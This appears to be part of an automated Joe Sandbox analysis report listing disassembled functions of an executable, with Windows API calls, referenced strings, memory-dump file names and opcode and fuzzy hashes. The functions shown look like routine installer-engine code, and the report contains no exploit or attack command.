                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __floor_pentium4
                                                                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                                                                    • Opcode ID: 024b549c1cd8daf85b367d13436571d5ca0663fd419591e6e68212047976c671
                                                                                                                                                                    • Instruction ID: 12b4d17cd53c8f4545b207e1d89bcce61a8b0c4882616e0c3f0a7b1083ae2aec
                                                                                                                                                                    • Opcode Fuzzy Hash: 024b549c1cd8daf85b367d13436571d5ca0663fd419591e6e68212047976c671
                                                                                                                                                                    • Instruction Fuzzy Hash: B7C25D71E086288FDB25CF28DD417EAB7B9EB84305F1445EAD54EE7240E778AE818F41
                                                                                                                                                                    Function 009061DF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 53COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastNameUser
                                                                                                                                                                    • String ID: Failed to get the user name.$Failed to set variant value.$variable.cpp
                                                                                                                                                                    • API String ID: 2054405381-1522884404
                                                                                                                                                                    • Opcode ID: 8cc44018e5d04a438952d0416107a12f28eb19c5926f9b0f3efa823c7d9800cd
                                                                                                                                                                    • Instruction ID: fcc390db1088c4cb77b3f8f201c02a5afb20f6416c4de80e7d53b592dad2d73a
                                                                                                                                                                    • Opcode Fuzzy Hash: 8cc44018e5d04a438952d0416107a12f28eb19c5926f9b0f3efa823c7d9800cd
                                                                                                                                                                    • Instruction Fuzzy Hash: 6401D676A052386BC720DB599C46FAB77AC9F41720F000255FC14E7281DB749D409BD5
                                                                                                                                                                    Function 0093FE21 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FormatMessageW.KERNEL32(00000900,?,?,00000000,00000000,00000000,?,00000000,?,?,009404F4,?,?,?,?,00000001), ref: 0093FE40
                                                                                                                                                                    • GetLastError.KERNEL32(?,009404F4,?,?,?,?,00000001,?,00905616,?,?,00000000,?,?,00905395,00000002), ref: 0093FE4C
                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,00000000,?,?,009404F4,?,?,?,?,00000001,?,00905616,?,?), ref: 0093FEB5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                    • String ID: logutil.cpp
                                                                                                                                                                    • API String ID: 1365068426-3545173039
                                                                                                                                                                    • Opcode ID: d7f0b7b1fdd87f23ccf418eee50bcedd1c3244e1e0c4bbcf53c77fdf996f2d82
                                                                                                                                                                    • Instruction ID: e44d52d868963ddeca22008b6573e93c838df8ec82293ded653d328a0ee54306
                                                                                                                                                                    • Opcode Fuzzy Hash: d7f0b7b1fdd87f23ccf418eee50bcedd1c3244e1e0c4bbcf53c77fdf996f2d82
                                                                                                                                                                    • Instruction Fuzzy Hash: 0B11CE36A00129EBDF319F84CD15EAF7B69EF54B11F018029FD0496171D7318E20EAA0
                                                                                                                                                                    Function 00926B88 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00926B32,00000000,00000003), ref: 00926B9F
                                                                                                                                                                    • GetLastError.KERNEL32(?,00926B32,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,00926F28,?), ref: 00926BA9
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to set service start type., xrefs: 00926BD7
                                                                                                                                                                    • msuengine.cpp, xrefs: 00926BCD
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ChangeConfigErrorLastService
                                                                                                                                                                    • String ID: Failed to set service start type.$msuengine.cpp
                                                                                                                                                                    • API String ID: 1456623077-1628545019
                                                                                                                                                                    • Opcode ID: 042f9cadaabaa9294e337b702789e4df5984318a8b352278663476f2971b2b8a
                                                                                                                                                                    • Instruction ID: f73bcf4905219f29d90c61eaf89d600c8490fcebb8bacde154cca97e4cc78d3f
                                                                                                                                                                    • Opcode Fuzzy Hash: 042f9cadaabaa9294e337b702789e4df5984318a8b352278663476f2971b2b8a
                                                                                                                                                                    • Instruction Fuzzy Hash: 6CF0E53764E1353B8730669AAC09E8F7E5C9F02BB1B114321FE38FA5D4DA61CD0082E0
                                                                                                                                                                    Function 00933C76 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00933D6E
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00933D78
                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(80003CDD,?,?,?,?,?,?), ref: 00933D85
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                    • Opcode ID: f40dca3d436c437efaeea25bc69fa422f7f8193b89fe05c7b8516e98ea2e81a7
                                                                                                                                                                    • Instruction ID: d610e294396c44c9d301acdb590ebe26483fafddd1568ceacdcae0c20b90f9a5
                                                                                                                                                                    • Opcode Fuzzy Hash: f40dca3d436c437efaeea25bc69fa422f7f8193b89fe05c7b8516e98ea2e81a7
                                                                                                                                                                    • Instruction Fuzzy Hash: 5031F47491122CABCB21DF65E988B8CBBB8BF08710F5041EAE81CA7251E7309F818F45
                                                                                                                                                                    Function 0093A560 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
                                                                                                                                                                    • Instruction ID: 86970605640f64eac4adb334922bcb97c03a3550504a08b15ff6dfb489939bb7
                                                                                                                                                                    • Opcode Fuzzy Hash: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
                                                                                                                                                                    • Instruction Fuzzy Hash: A9021A71E002199FDF14CFA9C8806AEB7F5EF88324F25816AD959E7384D731AE418F91
                                                                                                                                                                    Function 00943A5F Relevance: 3.1, APIs: 2, Instructions: 58memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00943BF1: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,00943A8E,?), ref: 00943C62
                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00943AB2
                                                                                                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00943AC3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateCheckCloseInitializeMembershipToken
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2114926846-0
                                                                                                                                                                    • Opcode ID: 912bf1c200a6cdc5a686d85945e71450e36d6c083f93522413311af70c8df80b
                                                                                                                                                                    • Instruction ID: 5715a37e3b78f85c68bc6173a493f2c6c80b1ac954ec1fa6a1abb8c93d9431ee
                                                                                                                                                                    • Opcode Fuzzy Hash: 912bf1c200a6cdc5a686d85945e71450e36d6c083f93522413311af70c8df80b
                                                                                                                                                                    • Instruction Fuzzy Hash: 2C11057194021EABDB10DFB5DC85FAFBBBCFF08300F50882EA552A6151E7709A44CB65
                                                                                                                                                                    Function 00944440 Relevance: 3.0, APIs: 2, Instructions: 44fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindFirstFileW.KERNEL32(0092923A,?,00000100,00000000,00000000), ref: 0094447B
                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00944487
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                                                    • Opcode ID: 40285f9b97eeaa31d2621b5b59730f21b1db6849508c6754dfff9f9d1b7a681d
                                                                                                                                                                    • Instruction ID: fa8872033c5e2c81b88e500182732d9644a9f931a01916337a51d3c609f12d8f
                                                                                                                                                                    • Opcode Fuzzy Hash: 40285f9b97eeaa31d2621b5b59730f21b1db6849508c6754dfff9f9d1b7a681d
                                                                                                                                                                    • Instruction Fuzzy Hash: 8501F93160021C6BCB10EF69ED89FABB3BCEBC5315F000165F914D3150D6349D498B64
                                                                                                                                                                    Function 00932C18 Relevance: 2.7, Strings: 2, Instructions: 214COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: 0$comres.dll
                                                                                                                                                                    • API String ID: 0-3030269839
                                                                                                                                                                    • Opcode ID: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
                                                                                                                                                                    • Instruction ID: 3258efbcd7718b332359abce35c2b1db886503f814dcf5038ecf2ac4a65cab67
                                                                                                                                                                    • Opcode Fuzzy Hash: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
                                                                                                                                                                    • Instruction Fuzzy Hash: F4517A70204B045BDB384B6885967BF63DD9B56340F281DA9E8D3DB2D2C609EE428F56
                                                                                                                                                                    Function 0093EE7C Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0093EE77,?,?,00000008,?,?,0093EB17,00000000), ref: 0093F0A9
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                                                    • Opcode ID: c01acf7e51c3ea99746cc1e6c7023c140811d77f2e61b29549d5760d2d06673b
                                                                                                                                                                    • Instruction ID: a065a31af3e636554e14119e009619b153155f775bf9c5d3dbeb4222a79c1c41
                                                                                                                                                                    • Opcode Fuzzy Hash: c01acf7e51c3ea99746cc1e6c7023c140811d77f2e61b29549d5760d2d06673b
                                                                                                                                                                    • Instruction Fuzzy Hash: 08B11736610609DFDB19CF28C49AB657BA0FF45364F258668E899CF2E2C335E981CF40
                                                                                                                                                                    Function 0092EC07 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0092EC20
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2325560087-0
                                                                                                                                                                    • Opcode ID: b4d81663071e6e467b2de7ae730034e1cf6ce5f11a4a1f764943ca707b747735
                                                                                                                                                                    • Instruction ID: 1c18835d227c83391ed231bdd811961e04d197b7d9e16477ab9596e1f7cd8fcb
                                                                                                                                                                    • Opcode Fuzzy Hash: b4d81663071e6e467b2de7ae730034e1cf6ce5f11a4a1f764943ca707b747735
                                                                                                                                                                    • Instruction Fuzzy Hash: 28518F71D142258BDB19CF99E8C57AABBF8FB48300F14846ED405EB294D3B5AD00DF51
                                                                                                                                                                    Function 0092E9DC Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0002E9E8,0092E131), ref: 0092E9E1
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                    • Opcode ID: 8f76cb6cd2def53bbfc8b45f070fc5ac864bf51008da00a8f0ceb0e7ea0f2a81
                                                                                                                                                                    • Instruction ID: c88c17072c559fc3f53c744e798dbf9026d8e7037870d0e44e5e490d9c0e9d74
                                                                                                                                                                    • Opcode Fuzzy Hash: 8f76cb6cd2def53bbfc8b45f070fc5ac864bf51008da00a8f0ceb0e7ea0f2a81
                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                    Function 0092FB89 Relevance: .5, Instructions: 481COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 159bead214cc8ccb9b14cecb2983c20fa64397b268cbfb1bd60161f083e9168c
                                                                                                                                                                    • Instruction ID: 000e43a1c0c4988a3de7f2dd597cc66f7172877157cc585f0472b578b67b634c
                                                                                                                                                                    • Opcode Fuzzy Hash: 159bead214cc8ccb9b14cecb2983c20fa64397b268cbfb1bd60161f083e9168c
                                                                                                                                                                    • Instruction Fuzzy Hash: D202F8321091B20BDB2D8639957007B7BF56A833B071E47BDD8F6CB1DADE10D964DA60
                                                                                                                                                                    Function 00930B6F Relevance: .4, Instructions: 352COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 713254dbb735968c7063ac25a152bc56bcdf297f8f834348282298adb5de4d15
                                                                                                                                                                    • Instruction ID: e18b97d28c16673195e2cfe2280f2525d80e02aa77536b9e9af4567d9de662f8
                                                                                                                                                                    • Opcode Fuzzy Hash: 713254dbb735968c7063ac25a152bc56bcdf297f8f834348282298adb5de4d15
                                                                                                                                                                    • Instruction Fuzzy Hash: ADC184372091A20BEF6D8639843407EFBE55AD23B1B1E1B9DD4F2CB0D5EE249535DA20
                                                                                                                                                                    Function 009307AA Relevance: .3, Instructions: 347COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: f3c7a540a95456d95b2f03679edd2d49eac6f1621006280bdad19664e1d0b21d
                                                                                                                                                                    • Instruction ID: 3be933df7da5e7ced86a6e8fc99d3bbde222c7253e6e0433f22f43cc5fb188f9
                                                                                                                                                                    • Opcode Fuzzy Hash: f3c7a540a95456d95b2f03679edd2d49eac6f1621006280bdad19664e1d0b21d
                                                                                                                                                                    • Instruction Fuzzy Hash: 35C19E371091A20AEF2D8239847417EFBE95ED23B1B1E179DD4F2CB1C6EE209565DE20
                                                                                                                                                                    Function 009303D5 Relevance: .3, Instructions: 331COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 43c190a499e79552c1a64f39d84a7142e521bf6eb77b491d3645054bb47bb5be
                                                                                                                                                                    • Instruction ID: 6767a3bb1c407db892acd7e7d46528dad7a6f8c34497c613e1d2166be381ad3b
                                                                                                                                                                    • Opcode Fuzzy Hash: 43c190a499e79552c1a64f39d84a7142e521bf6eb77b491d3645054bb47bb5be
                                                                                                                                                                    • Instruction Fuzzy Hash: 42C1B2321051A24BEF2D823A847507EBBE55AD27B1B1A179DE4F3CB0D5EE20D634DE20
                                                                                                                                                                    Function 0093001D Relevance: .3, Instructions: 323COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
